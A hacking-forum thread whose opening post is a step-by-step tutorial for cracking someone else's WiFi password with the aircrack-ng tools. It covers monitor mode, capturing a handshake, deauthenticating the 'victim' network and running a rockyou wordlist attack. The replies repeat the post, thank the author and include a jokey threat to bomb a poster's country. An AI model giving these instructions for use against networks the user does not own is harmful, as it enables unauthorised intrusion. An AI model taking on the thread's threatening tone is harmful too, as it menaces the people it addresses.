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So Hi guys Now this tutorial gonna cover a most awaited and wanted topic


Hacking A WiFi Network


Yeah hacking a WiFi network is considered as one of the most wanted hacks of all the time this tutorial gonna cover it in complete detail


SO lets start guys!









For this tutorial you need Kali Linux or Parrot Sec OS or even Ubuntu will work


You can get Kali Linux from and i am gonna use that in this tutorial


So first of all we need to update our linux distro by typing this command


apt update && apt upgrade -y


If you are doing it in a VM or in a enviornment in which you cant connect to wifi or if your network card does not support packet injection than you need to buy a new one you can check by googling that either your card will work for wifi hacking or not


The good choice is This One you can get this for a cheap price


So after the setup connect your wifi adapter with pc and than start the tutorial now type these commands


First open your terminal and type these commands


1 airmon-ng check kill


[to check the process to kill to start the process]


2 airmon-ng


3 airmon-ng start wlan0 {wlan0 can varry acc to your device you can see the name for your one by typing ifconfig}


[make the wifi card ready for wifi hacking]


4 airodump-ng wlan0mon


[starting the attack will capture everything now note the channel name and bssid of your target wifi ]


5 airodump-ng -c (ur victims channel here ) – -write /root/Desktop/hack —bssid (bssid) wlan0mon


[now the attack started]


6 aireplay-ng -0 0 -a (Bssid) wlan0mon


{Bssid will be of your victim}


7 aircrack-ng -a2 -b (bssid) -w /root/Desktop/rockyou.txt {file of your wordlist } /root/Desktop/hack-01.cap {path of captured file}


if now the user password was in your wordlist than you will get the password is not present than try a different wordlist in the next tutorial i will tell you how to create a wordlist for a specific user and even a full proof method that give you great succes results


NOTE : The 7th command will end according to your computer speed it depends on your machine power and even it can take alot long as it depends on your Wordlist and computer



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im going to bomb ur country if u keep posting :am1nolbroken:

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im going to bomb ur country if u keep posting :am1nolbroken:


:kek: :kek: :kek: :kek: :kek:

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Thanks for sharing and keep up the good work

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So Hi guys Now this tutorial gonna cover a most awaited and wanted topic


Hacking A WiFi Network


Yeah hacking a WiFi network is considered as one of the most wanted hacks of all the time this tutorial gonna cover it in complete detail


SO lets start guys!








sharing and keep up the good worksharing and keep up the good worksharing and keep up the good work

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thank you very much I needed it

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So Hi guys Now this tutorial gonna cover a most awaited and wanted topic


Hacking A WiFi Network


Yeah hacking a WiFi network is considered as one of the most wanted hacks of all the time this tutorial gonna cover it in complete detail


SO lets start guys!








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Very well wow

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thanks a bunch

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